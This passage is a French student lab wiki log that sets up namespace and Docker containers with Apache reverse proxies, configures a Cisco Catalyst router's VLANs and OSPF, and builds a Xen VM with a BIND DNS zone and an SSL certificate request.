  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
==Séance 1 : 26/11/2018==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage réseau IPV4 routé en deux sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage du réseau IPV4 non routée en sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
==Séance 2 : 27/11/2018==&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
===Mise en place du routeur et connexion à celui ci===&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
===Configuration du routeur : Configuration des ports===&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
===Mise en place de la machine virtuelle===&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
==Séance 3 : 10/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Config Routeur 3560===&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
===Mise en place des partitions pour la VM===&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
===Mise en place serveur DNS===&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
===Certificat SSL===&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
